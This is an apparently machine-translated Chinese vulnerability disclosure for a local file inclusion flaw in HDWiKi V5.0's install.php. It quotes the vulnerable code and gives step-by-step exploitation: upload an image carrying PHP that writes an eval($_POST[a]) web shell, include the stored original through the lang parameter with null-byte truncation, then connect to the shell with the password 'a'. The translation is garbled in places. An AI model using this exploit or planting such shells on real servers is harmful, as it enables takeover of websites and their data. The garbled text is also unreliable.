HDWiKi V 5.0 local include vulnerability 0Day-vulnerability warning-the black bar safety net

ID MYHACK58:62201128949
Type myhack58
Reporter 佚名
Modified 2011-01-26T00:00:00


Release date: 2011-01. 2 3 Publishing author: HYrz

Affected versions: HDWiKi V 5.0 Official website: http://kaiyuan.hudong.com

Vulnerability type: a file that contains Vulnerability description:

From the source code see there is indeed a problem,we just Upload a picture of the Trojan can be normal contains. But the problem came out,HDWiKi in the upload time for the image to be processed,directly upload an image format a PHP Trojan is not enough,Copy tied bundles of a picture and the Trojans also won't work,in my debugging time to find,upload up the picture of the Trojans in the contents of all are dispose of. Simply can not contain. But in image processing this part,the program first determines the file header whether the picture format,probably after the determination,the program will not potty directly transmitted to the server,but the picture for the next step processing. This is why the picture of the Trojan pass-up,opened with Notepad and didn't find your PHP code. But their upload module shows a serious defect,the program in processing the picture,and on the remote server to store this picture in the original file. And inside the PHP code has not been their processing. So long as it contains the original file,you can successfully get to the Shell.

漏洞 文件 :\install\install.php

Key code:

<? php error_reporting(E_ERROR | E_WARNING | E_PARSE); define('IN_HDWIKI', TRUE); define('HDWIKI_ROOT', '../');

$lang_name=$_COOKIE['lang_name'];/lang_name without any filter,direct from the Cookies deposited in lang_name/ if(isset($_REQUEST['lang'])){ /*

Detect whether the variable is set,otherwise enter the program body

/ $lang_name = $_REQUEST['lang']; /Get way to get the Lang value does not filter directly into lang_name. The above Cookies value part ignored him./ setcookie('lang_name',$lang_name); } if(!$ lang_name){ /not empty it to bypass,otherwise lang_name is initialized*/ $lang_name='EN'; }

require HDWIKI_ROOT."/ lang/$lang_name/install.php"; /simple to bypass,and OK to complete contains.% 0 0 truncated off the back,or an error occurs./ require HDWIKI_ROOT.'/ version.php'; require HDWIKI_ROOT.'/ model/base.class.php';

The use of the process:

  1. In HDWiKi user's station to register a user.

  2. In the personal management inside Upload a picture Trojan. The content is as follows:



<? $fp = @fopen("HYrz.php", 'a'); @fwrite($fp, '<'.'? php'."\ r\n\r\n".'eval($_POST[a])'."\ r\n\r\n?"."& gt;\r\n"); @fclose($fp); ?& gt;


  1. Right-get uploaded image address. Such as:http://localhost/uploads/userface/2/2. jpg? 0.8622666412804486 as long as we<http://localhost/uploads/userface/2/2.jpg>on the line.

Although access to the address,但 文件 并不 存在 . 我们 把 2.jpg 修 为 为 2_src.jpg. 如 :http://localhost/uploads/userface/2/2_src.jpg.


  1. Visit:http://localhost/install/install. php? lang=../uploads/userface/2/2_src. jpg%0 0 /note:here and above the 2 is to be according to the actual situation. If it is<http://localhost/uploads/userface/5/5_src.jpg>,then visit:http://localhost/install/install. php? lang=../uploads/userface/5/5_src. jpg%0 0 / !

5.一句话连接:http://localhost/install/HYrz.php password:a

Test environment:

Web Server:Winxp+Apache 2.2.15

allow_url_fopen On On allow_url_include Off Off magic_quotes_gpc Off Off